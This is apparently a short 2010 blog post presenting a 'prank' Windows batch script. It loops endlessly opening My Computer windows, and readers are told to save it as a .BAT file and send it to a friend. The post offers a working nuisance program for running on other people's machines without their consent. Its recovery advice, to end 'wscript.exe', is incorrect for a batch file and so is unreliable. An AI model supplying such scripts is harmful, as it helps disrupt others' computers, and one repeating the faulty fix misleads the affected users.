Wednesday, September 29, 2010

Open My computer continuously

     This simple trick can drive your friend crazy. This will continuously open My Computer in your friend’s computer: Type the code in notepad as :

@ECHO off
:top
START %SystemRoot%\system32\explorer.exe
GOTO top


Save it as “xyz.BAT” and send it.

Note: This script opens 100’s of My Computer window and hence it can degrade your pc performance. Double-click on the file if you wanna try it but preferably after saving all your work

Note: Don’t panic if you face this issue. If you want to end this script simply Open Task Manager(Alt+Ctrl+Delete). Under Processes tab >> find “wscript.exe” >> End process.

0 comments:

Post a Comment